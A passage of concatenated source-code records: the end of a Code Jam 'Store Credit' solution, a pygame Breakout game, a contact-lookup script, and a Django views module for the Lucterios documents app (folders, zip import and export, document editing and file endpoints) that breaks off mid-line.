3\n8\n8\n2 1 9 4 4 56 90 3\n\nOutput\nCase #1: 2 3\nCase #2: 1 4\nCase #3: 4 5\n\n\"\"\"\n__author__ = 'david'\n\nimport unittest\n\n\nclass StoreCredit(object):\n\n def __init__(self, input_file_name=None, output_file_name=None):\n self.input_file_name = input_file_name\n self.output_file_name = output_file_name\n\n # file I/O\n def read_word(self, file):\n return next(file).strip()\n\n def read_int(self, file, b=10):\n return int(self.read_word(file), b)\n\n def read_words(self, file, d=' '):\n return self.read_word(file).split(d)\n\n def read_ints(self, file, b=10, d=' '):\n return [int(x, b) for x in self.read_words(file, d)]\n\n def solve(self):\n\n # create I/O files\n input_file = open(self.input_file_name, 'r')\n output_file = open(self.output_file_name, \"w\")\n\n # read file size\n T = self.read_int(input_file)\n\n # initialize cases to 1\n case = 1\n\n print(\"There are %d cases to solve! :)\\n\\n\" % T)\n\n # iterate on each case\n for l in range(0,T):\n\n # get problem data\n credit = self.read_ints(input_file)[0]\n num_of_items = self.read_ints(input_file)[0]\n item_prices = self.read_ints(input_file)\n\n # print(str(credit), str(num_of_items), str(item_prices))\n\n found = False\n i = 0\n\n while not found and i < len(item_prices)-1:\n\n for j in range(i+1,len(item_prices)):\n # print(item_prices[i],item_prices[j])\n if item_prices[i] + item_prices[j] == credit:\n print(\"ok! %d %d\" % (i+1,j+1))\n output_file.write(\"Case #%d: %d %d\\n\" % (case,i+1,j+1))\n found = True\n i += 1\n\n case += 1\n\n # close I/O files\n input_file.close()\n output_file.close()\n\n\nclass Test(unittest.TestCase):\n\n def test_solve(self):\n # sc_sample = StoreCredit(\"B-sample.in\", \"B-sample.out\")\n # sc_sample = StoreCredit(\"A-small-practice.in\", \"A-small-practice.out\")\n sc_sample = StoreCredit(\"A-large-practice.in\", \"A-large-practice.out\")\n sc_sample.solve()\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"dosdos/googlecodejam","sub_path":"2010/africa_qualification_round/A_store_credit/store_credit.py","file_name":"store_credit.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36194884206","text":"#initialize\nimport pygame\nimport random\npygame.init()\n\n#set up display\nwidth = 800\nheight = 600\nscreen = pygame.display.set_mode((width, height))\npygame.display.set_caption(\"Breakout Game\")\n\n#colors\nwhite = (255, 255, 255)\nblack = (0, 0, 0)\nteal = (0, 255, 255)\nred = (255, 0, 0)\n\n#variables\npaddle_width = 100\npaddle_height = 20\npaddle_x = (width - paddle_width) // 2\npaddle_y = height - paddle_height - 10\npaddle_speed = 3\n\nball_radius = 10\nball_x = width // 2\nball_y = height // 2\nball_speed_x = 0.5\nball_speed_y = 0.5\n\nbrick_width = 100\nbrick_height = 20\nbrick_rows = 5\nbrick_cols = width // brick_width\nbrick_colors = [white, teal, red]\nbricks = []\nfor row in range(brick_rows):\n brick_row = []\n for col in range(brick_cols):\n #randomly choose a color\n color = random.choice(brick_colors)\n #get brick x and y position with a 2 pixel space between bricks and 1 pixel space for the border\n brick_x = 1 + (brick_width + 2) * col\n brick_y = 1 + (brick_height + 2) * row\n #create a rectangle for the brick\n brick_rect = pygame.Rect(brick_x, brick_y, brick_width, brick_height)\n #add the brick to the bricks array/list\n bricks.append((brick_rect, color))\n\n\n\n#main loop\nrunning = True\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n #Move the paddle\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT] and paddle_x > 0:\n paddle_x -= paddle_speed\n if keys[pygame.K_RIGHT] and paddle_x < width - paddle_width:\n paddle_x += paddle_speed\n\n #Move the ball\n ball_x += ball_speed_x\n ball_y += ball_speed_y\n\n #Check for wall collisions then bounce it in the opposite direction if it hits a wall\n if ball_x > width - ball_radius or ball_x < ball_radius:\n ball_speed_x *= -1\n if ball_y > height - ball_radius or ball_y < ball_radius:\n ball_speed_y *= -1\n\n #Check for paddle collisions\n if ball_x > paddle_x and ball_x < paddle_x + paddle_width and ball_y > paddle_y and ball_y < paddle_y + paddle_height:\n ball_speed_y *= -1\n ball_speed_x *= -1\n\n #Check for brick collisions\n for brick in bricks:\n if ball_x > brick[0].x and ball_x < brick[0].x + brick_width and ball_y > brick[0].y and ball_y < brick[0].y + brick_height:\n bricks.remove(brick)\n ball_speed_y *= -1\n\n #Clear the screen\n screen.fill(black)\n\n #Draw everything\n pygame.draw.rect(screen, white, (paddle_x, paddle_y, paddle_width, paddle_height))\n pygame.draw.circle(screen, red, (ball_x, ball_y), ball_radius)\n for brick in bricks:\n pygame.draw.rect(screen, brick[1], brick[0])\n pygame.display.flip()\n\n#Update the screen","repo_name":"AnaMuraya/game_dev_demos","sub_path":"breakout.py","file_name":"breakout.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72868933212","text":"contacts = [\n ('James', 42),\n ('Amy', 24),\n ('John', 31),\n ('Amanda', 63),\n ('Bob', 18)\n]\n\nentrada = input()\n\nlist_name = []\n\nfor name, age in contacts:\n list_name.append(name)\n if entrada == name:\n yes = f'{name} is {age}'\n else:\n no = 'Not Found'\n\nif entrada in list_name:\n print(yes)\nelse:\n print(no)\n","repo_name":"atnzpe/python-guanabara","sub_path":"lista_de_contatos.py","file_name":"lista_de_contatos.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11900584810","text":"from __future__ import unicode_literals\nfrom os.path import join, exists\nfrom os import makedirs, walk\nfrom shutil import rmtree\nfrom zipfile import ZipFile\nfrom logging import getLogger\n\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.apps.registry import apps\nfrom django.db.models import Q\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.views.decorators.http import require_GET\nfrom django.views import View\n\nfrom lucterios.framework.xferadvance import XferListEditor, XferDelete, XferAddEditor, XferShowEditor,\\\n TITLE_ADD, TITLE_MODIFY, TITLE_DELETE, TITLE_EDIT, TITLE_CANCEL, TITLE_OK,\\\n TEXT_TOTAL_NUMBER, TITLE_CLOSE, TITLE_SAVE\nfrom lucterios.framework.xfersearch import XferSearchEditor\nfrom lucterios.framework.tools import MenuManage, FORMTYPE_NOMODAL, ActionsManage, \\\n CLOSE_NO, FORMTYPE_REFRESH, SELECT_SINGLE, SELECT_NONE, \\\n WrapAction, CLOSE_YES, SELECT_MULTI, get_url_from_request\nfrom lucterios.framework.xfercomponents import XferCompButton, XferCompLabelForm, \\\n XferCompImage, XferCompUpLoad, XferCompDownLoad, XferCompSelect,\\\n XferCompGrid\nfrom lucterios.framework.error import LucteriosException, IMPORTANT\nfrom lucterios.framework import signal_and_lock\nfrom lucterios.framework.xfergraphic import XferContainerAcknowledge\nfrom lucterios.framework.filetools import get_tmp_dir, get_user_dir\nfrom lucterios.CORE.parameters import notfree_mode_connect\nfrom lucterios.CORE.models import LucteriosGroup, LucteriosUser\nfrom lucterios.CORE.editors import XferSavedCriteriaSearchEditor\n\nfrom lucterios.documents.models import FolderContainer, DocumentContainer, AbstractContainer\nfrom lucterios.documents.doc_editors import DocEditor\n\n\nMenuManage.add_sub(\"documents.conf\", \"core.extensions\", \"\", _(\"Document\"), \"\", 10)\n\n\n@MenuManage.describ('documents.change_folder', FORMTYPE_NOMODAL, 'documents.conf', _(\"Management of document's folders\"))\nclass FolderList(XferListEditor):\n caption = _(\"Folders\")\n icon = \"documentConf.png\"\n model = FolderContainer\n field_id = 'folder'\n\n\n@ActionsManage.affect_grid(TITLE_ADD, \"images/add.png\")\n@ActionsManage.affect_grid(TITLE_MODIFY, \"images/edit.png\", unique=SELECT_SINGLE)\n@MenuManage.describ('documents.add_folder')\nclass FolderAddModify(XferAddEditor):\n icon = \"documentConf.png\"\n model = FolderContainer\n field_id = 'folder'\n caption_add = _(\"Add folder\")\n caption_modify = _(\"Modify folder\")\n\n def _search_model(self):\n current_folder = self.getparam('current_folder', 0)\n if (current_folder != 0) and (current_folder != self.getparam('folder', 0)):\n self.params['parent'] = current_folder\n XferAddEditor._search_model(self)\n\n def fillresponse(self):\n XferAddEditor.fillresponse(self)\n parentid = self.getparam('parent', 0)\n if (self.item.id is None) and (parentid != 0):\n parent = FolderContainer.objects.get(id=parentid)\n viewer = self.get_components('viewer')\n viewer.set_value([group.id for group in parent.viewer.all()])\n modifier = self.get_components('modifier')\n modifier.set_value([group.id for group in parent.modifier.all()])\n\n\n@ActionsManage.affect_grid(TITLE_DELETE, \"images/delete.png\", unique=SELECT_MULTI)\n@MenuManage.describ('documents.delete_folder')\nclass FolderDel(XferDelete):\n caption = _(\"Delete folder\")\n icon = \"documentConf.png\"\n model = FolderContainer\n field_id = 'folder'\n\n\nclass FolderImportExport(XferContainerAcknowledge):\n icon = \"documentConf.png\"\n model = FolderContainer\n field_id = 'folder'\n\n def add_components(self, dlg):\n pass\n\n def run_archive(self):\n pass\n\n def fillresponse(self):\n if self.getparam('SAVE') is None:\n dlg = self.create_custom()\n dlg.item = self.item\n img = XferCompImage('img')\n img.set_value(self.icon_path())\n img.set_location(0, 0, 1, 3)\n dlg.add_component(img)\n lbl = XferCompLabelForm('title')\n lbl.set_value_as_title(self.caption)\n lbl.set_location(1, 0, 6)\n dlg.add_component(lbl)\n\n dlg.fill_from_model(1, 1, False, desc_fields=['parent'])\n parent = dlg.get_components('parent')\n parent.colspan = 3\n\n self.add_components(dlg)\n dlg.add_action(self.return_action(TITLE_OK, \"images/ok.png\"), close=CLOSE_YES, params={'SAVE': 'YES'})\n dlg.add_action(WrapAction(TITLE_CANCEL, 'images/cancel.png'))\n else:\n if self.getparam(\"parent\", 0) != 0:\n self.item = FolderContainer.objects.get(id=self.getparam(\"parent\", 0))\n else:\n self.item = FolderContainer()\n self.run_archive()\n\n\n@ActionsManage.affect_grid(_(\"Import\"), \"zip.png\", unique=SELECT_NONE)\n@MenuManage.describ('documents.add_folder')\nclass FolderImport(FolderImportExport):\n caption = _(\"Import\")\n\n def add_components(self, dlg):\n dlg.fill_from_model(1, 2, False, desc_fields=['viewer', 'modifier'])\n zipfile = XferCompUpLoad('zipfile')\n zipfile.http_file = True\n zipfile.description = _('zip file')\n zipfile.maxsize = 1024 * 1024 * 1024 # 1Go\n zipfile.add_filter('.zip')\n zipfile.set_location(1, 15)\n dlg.add_component(zipfile)\n\n def run_archive(self):\n viewerids = self.getparam(\"viewer\", ())\n modifierids = self.getparam(\"modifier\", ())\n if 'zipfile' in self.request.FILES.keys():\n upload_file = self.request.FILES['zipfile']\n tmp_dir = join(get_tmp_dir(), 'zipfile')\n if exists(tmp_dir):\n rmtree(tmp_dir)\n makedirs(tmp_dir)\n try:\n with ZipFile(upload_file, 'r') as zip_ref:\n zip_ref.extractall(tmp_dir)\n viewers = LucteriosGroup.objects.filter(id__in=viewerids)\n modifiers = LucteriosGroup.objects.filter(id__in=modifierids)\n self.item.import_files(\n tmp_dir, viewers, modifiers, self.request.user)\n finally:\n if exists(tmp_dir):\n rmtree(tmp_dir)\n\n\n@ActionsManage.affect_grid(_(\"Extract\"), \"zip.png\", unique=SELECT_NONE)\n@MenuManage.describ('documents.add_folder')\nclass FolderExtract(FolderImportExport):\n caption = _(\"Extract\")\n\n def open_zipfile(self, filename):\n dlg = self.create_custom()\n dlg.item = self.item\n img = XferCompImage('img')\n img.set_value(self.icon_path())\n img.set_location(0, 0, 1, 3)\n dlg.add_component(img)\n lbl = XferCompLabelForm('title')\n lbl.set_value_as_title(self.caption)\n lbl.set_location(1, 0, 6)\n dlg.add_component(lbl)\n zipdown = XferCompDownLoad('filename')\n zipdown.compress = False\n zipdown.http_file = True\n zipdown.maxsize = 0\n zipdown.set_value(filename)\n zipdown.set_download(filename)\n zipdown.set_location(1, 15, 2)\n dlg.add_component(zipdown)\n\n def run_archive(self):\n tmp_dir = join(get_tmp_dir(), 'zipfile')\n download_file = join(get_user_dir(), 'extract.zip')\n if exists(tmp_dir):\n rmtree(tmp_dir)\n makedirs(tmp_dir)\n try:\n self.item.extract_files(tmp_dir)\n with ZipFile(download_file, 'w') as zip_ref:\n for (dirpath, _dirs, filenames) in walk(tmp_dir):\n for filename in filenames:\n zip_ref.write(\n join(dirpath, filename), join(dirpath[len(tmp_dir):], filename))\n finally:\n if exists(tmp_dir):\n rmtree(tmp_dir)\n self.open_zipfile('extract.zip')\n\n\nif not apps.is_installed(\"lucterios.contacts\"):\n MenuManage.add_sub(\"office\", None, \"lucterios.documents/images/office.png\", _(\"Office\"), _(\"Office tools\"), 70)\n\nMenuManage.add_sub(\"documents.actions\", \"office\", \"lucterios.documents/images/document.png\",\n _(\"Documents management\"), _(\"Documents storage tools\"), 80)\n\n\ndef docshow_modify_condition(xfer):\n if xfer.item.parent is not None and notfree_mode_connect() and not xfer.request.user.is_superuser:\n if xfer.item.parent.cannot_view(xfer.request.user):\n raise LucteriosException(IMPORTANT, _(\"No allow to view!\"))\n if xfer.item.parent.is_readonly(xfer.request.user):\n return False\n return True\n\n\ndef folder_notreadonly_condition(xfer, gridname=''):\n if notfree_mode_connect() and not xfer.request.user.is_superuser:\n if not hasattr(xfer, 'current_folder'):\n return False\n elif xfer.current_folder > 0:\n folder = FolderContainer.objects.get(id=xfer.current_folder)\n if folder.cannot_view(xfer.request.user):\n raise LucteriosException(IMPORTANT, _(\"No allow to view!\"))\n if folder.is_readonly(xfer.request.user):\n return False\n return True\n\n\n@ActionsManage.affect_grid(TITLE_ADD, \"images/add.png\", condition=folder_notreadonly_condition)\n@ActionsManage.affect_show(TITLE_MODIFY, \"images/edit.png\", close=CLOSE_YES, condition=docshow_modify_condition)\n@MenuManage.describ('documents.add_document')\nclass DocumentAddModify(XferAddEditor):\n icon = \"document.png\"\n model = DocumentContainer\n field_id = 'document'\n caption_add = _(\"Add document\")\n caption_modify = _(\"Modify document\")\n\n def _search_model(self):\n current_folder = self.getparam('current_folder', 0)\n if current_folder != 0:\n self.params['parent'] = current_folder\n XferAddEditor._search_model(self)\n\n def fillresponse(self):\n if not docshow_modify_condition(self):\n raise LucteriosException(IMPORTANT, _(\"No allow to write!\"))\n XferAddEditor.fillresponse(self)\n\n\n@ActionsManage.affect_grid(TITLE_EDIT, \"images/show.png\", unique=SELECT_SINGLE)\n@MenuManage.describ('documents.change_document')\nclass DocumentShow(XferShowEditor):\n caption = _(\"Show document\")\n icon = \"document.png\"\n model = DocumentContainer\n field_id = 'document'\n\n\n@ActionsManage.affect_show(_('Editor'), \"file.png\", modal=FORMTYPE_NOMODAL,\n close=CLOSE_YES, condition=lambda xfer: xfer.item.get_doc_editors(wantWrite=False) is not None)\n@MenuManage.describ('documents.add_document')\nclass DocumentEditor(XferContainerAcknowledge):\n caption = _(\"Edit document\")\n icon = \"document.png\"\n model = DocumentContainer\n field_id = 'document'\n\n def fillresponse(self):\n editor = self.item.get_doc_editors(self.request.user, False)\n if self.getparam('SAVE', '') == 'YES':\n editor.save_content()\n elif self.getparam('CLOSE', '') == 'YES':\n editor.close()\n else:\n editor.send_content()\n dlg = self.create_custom(self.model)\n dlg.item = self.item\n dlg.fill_from_model(0, 0, True, [('parent', 'name')])\n frame = XferCompLabelForm('frame')\n frame.set_value(editor.get_iframe())\n frame.set_location(0, 2, 2, 0)\n dlg.add_component(frame)\n if editor.withSaveBtn:\n dlg.add_action(self.return_action(TITLE_SAVE, 'images/save.png'), close=CLOSE_NO, params={'SAVE': 'YES'})\n dlg.add_action(WrapAction(TITLE_CLOSE, 'images/close.png'))\n dlg.set_close_action(self.return_action(), params={'CLOSE': 'YES'})\n\n\n@ActionsManage.affect_grid(_('Folder'), \"images/add.png\")\n@MenuManage.describ('documents.add_folder')\nclass ContainerAddFolder(XferContainerAcknowledge):\n caption = _(\"Add folder\")\n icon = \"document.png\"\n model = AbstractContainer\n field_id = 'container'\n\n def fillresponse(self, current_folder=0):\n self.redirect_action(FolderAddModify.get_action(), close=CLOSE_YES, params={'parent': current_folder})\n\n\ndef file_createnew_condition(xfer, gridname=''):\n if folder_notreadonly_condition(xfer, gridname):\n return (len(DocEditor.get_all_extension_supported()) > 0)\n else:\n return False\n\n\n@ActionsManage.affect_grid(_('File'), \"images/new.png\", condition=file_createnew_condition)\n@MenuManage.describ('documents.add_document')\nclass ContainerAddFile(XferContainerAcknowledge):\n caption = _(\"Create document\")\n icon = \"document.png\"\n model = DocumentContainer\n field_id = 'document'\n\n def fillresponse(self, current_folder=0, docext=\"\"):\n if current_folder == 0:\n current_folder = None\n if self.getparam('CONFIRME', '') == 'YES':\n self.params = {}\n filename_spited = self.item.name.split('.')\n if len(filename_spited) > 1:\n filename_spited = filename_spited[:-1]\n self.item.name = \"%s.%s\" % (\".\".join(filename_spited), docext)\n self.item.parent_id = current_folder\n self.item.editor.before_save(self)\n self.item.save()\n self.item.get_doc_editors(self.request.user, True).get_empty()\n self.redirect_action(DocumentEditor.get_action(), modal=FORMTYPE_NOMODAL, close=CLOSE_YES, params={'document': self.item.id})\n else:\n dlg = self.create_custom(self.model)\n max_row = dlg.get_max_row() + 1\n img = XferCompImage('img')\n img.set_value(self.icon_path())\n img.set_location(0, 0, 1, 6)\n dlg.add_component(img)\n dlg.item.parent_id = current_folder\n dlg.fill_from_model(1, max_row, True, ['parent'])\n dlg.fill_from_model(1, max_row + 1, False, ['name', 'description'])\n\n max_row = dlg.get_max_row() + 1\n select = XferCompSelect('docext')\n select.set_select([(item, item) for item in DocEditor.get_all_extension_supported()])\n select.set_value(select.select_list[0][1])\n select.set_location(1, max_row)\n select.description = _('document type')\n dlg.add_component(select)\n dlg.add_action(self.return_action(TITLE_OK, 'images/ok.png'), close=CLOSE_YES, params={'CONFIRME': 'YES'})\n dlg.add_action(WrapAction(TITLE_CLOSE, 'images/close.png'))\n\n\n@ActionsManage.affect_grid(TITLE_DELETE, \"images/delete.png\", unique=SELECT_MULTI, condition=folder_notreadonly_condition)\n@MenuManage.describ('documents.delete_document')\nclass DocumentDel(XferDelete):\n caption = _(\"Delete document\")\n icon = \"document.png\"\n model = DocumentContainer\n field_id = 'document'\n\n def fillresponse(self):\n if len(self.items) > 0:\n self.item = self.items[0]\n else:\n self.item = DocumentContainer()\n if not docshow_modify_condition(self):\n raise LucteriosException(IMPORTANT, _(\"No allow to write!\"))\n XferDelete.fillresponse(self)\n\n\n@MenuManage.describ('documents.change_document', FORMTYPE_NOMODAL, 'documents.actions', _(\"Management of documents\"))\nclass DocumentList(XferListEditor):\n caption = _(\"Documents\")\n icon = \"document.png\"\n model = DocumentContainer\n field_id = 'document'\n\n def fillresponse_header(self):\n self.current_folder = self.getparam('current_folder', 0)\n if self.current_folder > 0:\n self.filter = Q(parent=self.current_folder)\n else:\n self.filter = Q(parent=None)\n self.fill_current_folder()\n\n def fillresponse(self):\n XferListEditor.fillresponse(self)\n self.move_components('document', 1, -1)\n self.get_components('document').colspan = 4\n if folder_notreadonly_condition(self):\n self.add_document()\n\n def fill_current_folder(self):\n lbl = XferCompLabelForm('title_folder')\n if self.current_folder > 0:\n folder_obj = FolderContainer.objects.get(id=self.current_folder)\n lbl.set_value(folder_obj.get_title())\n folder_description = folder_obj.description\n else:\n folder_obj = FolderContainer()\n lbl.set_value('>')\n folder_description = \"\"\n lbl.set_location(1, 2, 1)\n lbl.description = _(\"current folder:\")\n self.add_component(lbl)\n\n lbl = XferCompLabelForm('desc_folder')\n lbl.set_value_as_header(folder_description)\n lbl.set_location(0, 3, 2)\n self.add_component(lbl)\n\n if self.current_folder > 0:\n btn_return = XferCompButton('return')\n btn_return.set_location(2, 2)\n btn_return.set_is_mini(True)\n btn_return.set_action(self.request, self.return_action('', 'images/left.png'), params={'current_folder': folder_obj.parent_id if folder_obj.parent_id is not None else 0},\n modal=FORMTYPE_REFRESH, close=CLOSE_NO)\n self.add_component(btn_return)\n\n btn_edit = XferCompButton('edit')\n btn_edit.set_location(4, 2)\n btn_edit.set_is_mini(True)\n btn_edit.set_action(self.request, FolderAddModify.get_action('', 'images/edit.png'),\n params={'folder': self.current_folder}, close=CLOSE_NO)\n self.add_component(btn_edit)\n folder = XferCompGrid(\"current_folder\")\n folder.set_model(folder_obj.get_subfolders(self.request.user, False), [\"icon\", \"name\"])\n folder.set_location(0, 4, 1)\n folder.add_action(self.request, self.return_action(\"\", 'images/right.png'), close=CLOSE_NO, modal=FORMTYPE_REFRESH, unique=SELECT_SINGLE)\n folder.add_action(self.request, FolderAddModify.get_action(\"\", \"images/add.png\"), close=CLOSE_NO)\n folder.add_action(self.request, self.return_action(\"\", \"images/delete.png\"), close=CLOSE_NO, unique=SELECT_SINGLE)\n self.add_component(folder)\n return folder_obj\n\n def add_document(self):\n last_row = self.get_max_row() + 5\n lbl = XferCompLabelForm('sep1')\n lbl.set_location(0, last_row, 6)\n lbl.set_value(\"{[center]}{[hr/]}{[/center]}\")\n self.add_component(lbl)\n lbl = XferCompLabelForm('sep2')\n lbl.set_location(0, last_row + 1, 3)\n lbl.set_value_as_infocenter(_(\"Add document\"))\n self.add_component(lbl)\n\n self.fill_from_model(0, last_row + 3, False)\n self.remove_component('parent')\n self.get_components('filename').colspan = 3\n self.get_components('description').colspan = 3\n\n btn_doc = XferCompButton('adddoc')\n btn_doc.set_location(3, last_row + 4)\n btn_doc.set_is_mini(True)\n btn_doc.set_action(self.request, DocumentAddModify.get_action(TITLE_ADD, 'images/add.png'),\n params={'parent': self.current_folder, 'SAVE': 'YES'}, close=CLOSE_NO)\n self.add_component(btn_doc)\n\n\n@MenuManage.describ('documents.change_document', FORMTYPE_NOMODAL, 'documents.actions', _('To find a document following a set of criteria.'))\nclass DocumentSearch(XferSavedCriteriaSearchEditor):\n caption = _(\"Document search\")\n icon = \"documentFind.png\"\n model = DocumentContainer\n field_id = 'document'\n mode_select = SELECT_SINGLE\n select_class = None\n\n def get_text_search(self):\n criteria_desc = XferSavedCriteriaSearchEditor.get_text_search(self)\n if notfree_mode_connect() and not self.request.user.is_superuser:\n if self.filter is None:\n self.filter = Q()\n self.filter = self.filter & (Q(parent=None) | Q(parent__viewer__in=self.request.user.groups.all()))\n return criteria_desc\n\n def fillresponse(self):\n XferSearchEditor.fillresponse(self)\n grid = self.get_components(self.field_id)\n grid.actions = []\n grid.add_action(self.request, DocumentShow.get_action(TITLE_EDIT, \"images/show.png\"), close=CLOSE_NO, unique=SELECT_SINGLE)\n if self.select_class is not None:\n grid.add_action(self.request, self.select_class.get_action(_(\"Select\"), \"images/ok.png\"), close=CLOSE_YES, unique=self.mode_select, pos_act=0)\n\n\n@ActionsManage.affect_show(_('delete shared link'), \"images/permissions.png\", condition=lambda xfer: xfer.item.sharekey is not None)\n@ActionsManage.affect_show(_('create shared link'), \"images/permissions.png\", condition=lambda xfer: xfer.item.sharekey is None)\n@MenuManage.describ('documents.add_document')\nclass DocumentChangeShared(XferContainerAcknowledge):\n icon = \"document.png\"\n model = DocumentContainer\n field_id = 'document'\n\n def fillresponse(self):\n self.item.change_sharekey(self.item.sharekey is not None)\n self.item.save()\n\n\n@MenuManage.describ('')\nclass DownloadFile(XferContainerAcknowledge):\n icon = \"document.png\"\n model = DocumentContainer\n field_id = 'document'\n caption = _(\"Download document\")\n methods_allowed = ('GET', 'PUT')\n\n def request_handling(self, request, *args, **kwargs):\n from django.http.response import StreamingHttpResponse, HttpResponse\n getLogger(\"lucterios.documents\").debug(\">> DownloadFile get %s [%s]\", request.path, request.user)\n try:\n self._initialize(request, *args, **kwargs)\n fileid = self.getparam('fileid', 0)\n shared = self.getparam('shared', '')\n filename = self.getparam('filename', '')\n try:\n if fileid == 0:\n doc = DocumentContainer.objects.get(name=filename, sharekey=shared)\n else:\n doc = DocumentContainer.objects.get(id=fileid, name=filename)\n response = StreamingHttpResponse(doc.content, content_type='application/octet-stream')\n response['Content-Disposition'] = 'attachment; filename=%s' % doc.name\n if hasattr(request, 'session') and hasattr(request.session, 'accessed'):\n request.session.accessed = False\n if hasattr(request, 'session') and hasattr(request.session, 'modified'):\n request.session.modified = False\n except DocumentContainer.DoesNotExist:\n getLogger('lucterios.documents.DownloadFile').exception(\"downloadFile\")\n response = HttpResponse(_(\"File not found !\"))\n return response\n finally:\n getLogger(\"lucterios.documents\").debug(\"<< DownloadFile get %s [%s]\", request.path, request.user)\n\n\n@MenuManage.describ('')\nclass UploadFile(XferContainerAcknowledge):\n icon = \"document.png\"\n field_id = 'document'\n caption = \"document\"\n\n def request_handling(self, request, *args, **kwargs):\n getLogger(\"lucterios.documents\").debug(\">> UploadFile get %s [%s]\", request.path, request.user)\n try:\n from lucterios.documents.doc_editors import OnlyOfficeEditor\n from django.http.response import JsonResponse\n self._initialize(request, *args, **kwargs)\n doc = DocumentContainer.objects.get(id=self.getparam('fileid', 0), name=self.getparam('filename', ''))\n editor = OnlyOfficeEditor(get_url_from_request(request), doc)\n responsejson = editor.uploadFile(request.body)\n return JsonResponse(responsejson, json_dumps_params={'indent': 3})\n finally:\n getLogger(\"lucterios.documents\").debug(\"<< UploadFile get %s [%s]\", request.path, request.user)\n\n\ndef file_check_permission(file_id, request):\n from django.http.response import HttpResponse, HttpResponseNotFound\n can_write = False\n user = None\n try:\n doc = DocumentContainer.objects.get(id=file_id)\n except (ValueError, ObjectDoesNotExist):\n return HttpResponseNotFound(f\"File id {file_id} no found\".encode())\n if ('access_token' not in request.GET) or (request.GET['access_token'].count('-') != 1):\n return HttpResponse(b\"token invalid: no token\", status=401)\n user_id, date_timestamp = request.GET['access_token'].split('-')\n user_id = int(user_id)\n if str(doc.date_modification.timestamp()) != date_timestamp:\n return HttpResponse(b\"token invalid: timestamp\", status=401)\n if user_id == 0:\n if notfree_mode_connect():\n return HttpResponse(b\"token invalid: unsecure\", status=401)\n else:\n can_write = True\n else:\n try:\n user = LucteriosUser.objects.get(id=user_id)\n except ObjectDoesNotExist:\n return HttpResponse(b\"token invalid: user unknown\", status=401)\n if doc.parent.cannot_view(user):\n return HttpResponse(b\"token invalid: no permission\", status=401)\n can_write = not doc.parent.is_readonly(user)\n return doc, can_write, user\n\n\n@require_GET\ndef check_file_info(request, file_id):\n from django.http.response import JsonResponse, HttpResponseBase, HttpResponseServerError\n getLogger(\"lucterios.documents\").debug(f\"Check file: file id: {file_id}\")\n try:\n perm_res = file_check_permission(file_id, request)\n if isinstance(perm_res, HttpResponseBase):\n return perm_res\n doc, can_write, user = perm_res\n res = {\n 'BaseFileName': doc.name,\n 'Size': len(doc.content.read()),\n 'UserId': str(user.id) if user is not None else '0',\n 'OwnerId': str(doc.creator.id) if doc.creator is not None else '0',\n 'UserCanWrite': can_write,\n 'UserFriendlyName': str(user) if user is not None else '---',\n 'HidePrintOption': False,\n 'DisablePrint': False,\n 'HideSaveOption': False,\n 'HideExportOption': True,\n 'DisableExport': True,\n 'DisableCopy': True,\n 'EnableOwnerTermination': False,\n 'LastModifiedTime': doc.date_modification.isoformat(),\n 'IsUserLocked': False,\n 'IsUserRestricted': False,\n }\n return JsonResponse(res)\n except Exception:\n getLogger(\"lucterios.documents\").exception(\"check_file_info failure!!!\")\n return HttpResponseServerError()\n\n\nclass FileContentView(View):\n\n @staticmethod\n def get(request, file_id):\n from django.http.response import HttpResponse, HttpResponseBase, HttpResponseServerError\n getLogger(\"lucterios.documents\").info(f\"GetFile: file id: {file_id}, access token: {request.GET['access_token']}\")\n try:\n perm_res = file_check_permission(file_id, request)\n if isinstance(perm_res, HttpResponseBase):\n return perm_res\n doc, _can_write, _user_id = perm_res\n return HttpResponse(doc.content.read())\n except Exception:\n getLogger(\"lucterios.documents\").exception(\"FileContentView get failure!!!\")\n return HttpResponseServerError()\n\n @staticmethod\n def post(request, file_id):\n from django.http.response import HttpResponse, HttpResponseBase, HttpResponseNotFound, HttpResponseServerError\n getLogger(\"lucterios.documents\").info(f\"PutFile: file id: {file_id}, access token: {request.GET['access_token']}\")\n if not request.body:\n return HttpResponseNotFound(b'Not possible to get the file content.')\n try:\n perm_res = file_check_permission(file_id, request)\n if isinstance(perm_res, HttpResponseBase):\n return perm_res\n doc, _can_write, _user_id = perm_res\n doc.content = request.read()\n return HttpResponse() # status 200\n except Exception:\n getLogger(\"lucterios.documents\").exception(\"FileContentView post failure!!!\")\n return HttpResponseServerError()\n\n\n@signal_and_lock.Signal.decorate('summary')\ndef summary_documents(xfer):\n if not hasattr(xfer, 'add_component'):\n return WrapAction.is_permission(xfer, 'documents.change_document')\n elif WrapAction.is_permission(xfer.request, 'documents.change_document'):\n row = xfer.get_max_row() + 1\n lab = XferCompLabelForm('documenttitle')\n lab.set_value_as_infocenter(_('Document management'))\n lab.set_location(0, row, 4)\n xfer.add_component(lab)\n filter_result = Q()\n if notfree_mode_connect():\n filter_result = filter_result & (Q(parent=None) | Q(parent__viewer__in=xfer.request.user.groups.all() if xfer.request.user.id is not None else []))\n nb_doc = len(DocumentContainer.objects.filter(*[filter_result]))\n lbl_doc = XferCompLabelForm('lbl_nbdocument')\n lbl_doc.set_location(0, row + 1, 4)\n if nb_doc == 0:\n lbl_doc.set_value_center(_(\"no file currently available\"))\n elif nb_doc == 1:\n lbl_doc.set_value_center(_(\"one file currently available\"))\n else:\n lbl_doc.set_value_center(_(\"%d files currently available\") % nb_doc)\n xfer.add_component(lbl_doc)\n lab = XferCompLabelForm('documentend')\n lab.set_value_center('{[hr/]}')\n lab.set_location(0, row + 2, 4)\n xfer.add_component(lab)\n return True\n else:\n return False\n\n\n@signal_and_lock.Signal.decorate('get_url_patterns')\ndef get_url_patterns(url_patterns):\n from django.conf.urls import url\n url_patterns.append(url(r'^lucterios.documents/files/(.*)/contents', FileContentView.as_view()))\n url_patterns.append(url(r'^lucterios.documents/files/(.*)', 